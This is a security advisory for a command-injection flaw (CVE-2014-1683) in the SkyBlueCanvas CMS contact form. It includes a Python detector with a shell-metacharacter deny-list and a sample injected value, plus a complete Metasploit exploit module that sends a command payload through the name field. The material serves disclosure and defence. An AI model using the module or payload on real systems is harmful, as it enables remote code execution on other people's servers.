Release date:
Updated on:
Affected Systems:
SkyBlueCanvas 1.1-r248-03
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65129
CVE (CAN) ID: CVE-2014-1683
SkyBlueCanvas is a Web content management system.
In SkyBlueCanvas versions earlier than 1.1 r248-04, the bashMail function in cms/data/skins/techjunkie/fragments/contacts/functions.php is vulnerable to command injection. When the pid parameter is 4, remote attackers can execute arbitrary commands through shell metacharacters in the name, email, subject, and message parameters sent to index.php.
<* Source: Scott Parish (srp@srparish.net)
Link: http://secunia.com/advisories/56646/
http://xforce.iss.net/xforce/xfdb/90670
*>
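The request pattern described above can be flagged on the defensive side. The following is an added example, not code from the advisory or from SkyBlueCanvas: a Python check that inspects a contact-form POST to index.php with pid=4 for shell metacharacters in the four named fields. The function name, the deny-list and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Fields the advisory names as reaching the shell.
WATCHED_FIELDS = ("name", "email", "subject", "message")
# Constructed deny-list of characters a POSIX shell treats specially.
# Free-text fields such as "message" can legitimately contain some of
# these, so hits are alerts to triage, not proof of an attack.
SHELL_META = re.compile(r'[;&|`$<>"\n\r]')


def flag_contact_post(method, url, body):
    """Return {field: [metacharacters]} for a suspicious contact-form POST.

    Only POSTs to index.php carrying pid=4 are inspected, matching the
    condition in the advisory; any other request returns {}.
    """
    parts = urlsplit(url)
    if method.upper() != "POST" or not parts.path.endswith("index.php"):
        return {}
    if "4" not in parse_qs(parts.query).get("pid", []):
        return {}
    form = parse_qs(body, keep_blank_values=True)  # URL-decodes the values
    hits = {}
    for field in WATCHED_FIELDS:
        found = set()
        for value in form.get(field, []):
            found.update(SHELL_META.findall(value))
        if found:
            hits[field] = sorted(found)
    return hits


# Constructed sample requests (not captured traffic).
BENIGN = ("POST", "/index.php?pid=4",
          "cid=3&name=Alice+Smith&email=alice%40example.org"
          "&subject=Hello&message=Nice+site.&action=send")
SUSPECT = ("POST", "/index.php?pid=4",
           "cid=3&name=abc%22%3Bid%3B&email=a%40example.org"
           "&subject=x&message=y&action=send")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, flag_contact_post(*req))
```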
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SkyBlueCanvas CMS Remote Code Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability
        in SkyBlueCanvas CMS version 1.1 r248-03 and below.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Parish', # Vulnerability discovery and exploit
          'xistence <xistence[at]0x90.nl>' # Metasploit Module
        ],
      'References'     =>
        [
          ['CVE', '2014-1683'],
          ['OSVDB', '123'],
          ['BID', '65129'],
          ['EDB', '123'],
          ['URL', 'http://packetstormsecurity.com/files/124948/skybluecanvas-cms-1.1-r248-03-command-injection.html']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space'       => 262144, # 256k
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
              'PayloadType'    => 'cmd',
              'RequiredCmd'    => 'generic perl ruby bash telnet python'
            }
        },
      'Platform'       => %w{ unix },
      'Targets'        =>
        [
          ['SkyBlueCanvas 1.1 r248', {}]
        ],
      'Arch'           => ARCH_CMD,
      'DisclosureDate' => 'Jan 28 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The path to the SkyBlueCanvas CMS installation", "/"]),
      ], self.class)
  end

  def check
    uri = normalize_uri(target_uri.path.to_s, "index.php")

    res = send_request_raw('uri' => uri)

    # Match the literal version string; written as /[1.1 r248]/ it would be
    # a character class that matches almost any response body.
    if res and res.body =~ /1\.1 r248/
      vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found")
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    uri = normalize_uri(target_uri.path.to_s, "index.php")

    # The contact form (pid=4) passes the posted fields to bashMail.
    send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'vars_get'  => { 'pid' => '4' },
      'vars_post' =>
        {
          'cid'     => '3',
          'name'    => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};",
          'email'   => rand_text_alphanumeric(10),
          'subject' => rand_text_alphanumeric(10),
          'message' => rand_text_alphanumeric(10),
          'action'  => 'send'
        }
    })
  end
end
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
SkyBlueCanvas
-------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://skybluecanvas.com/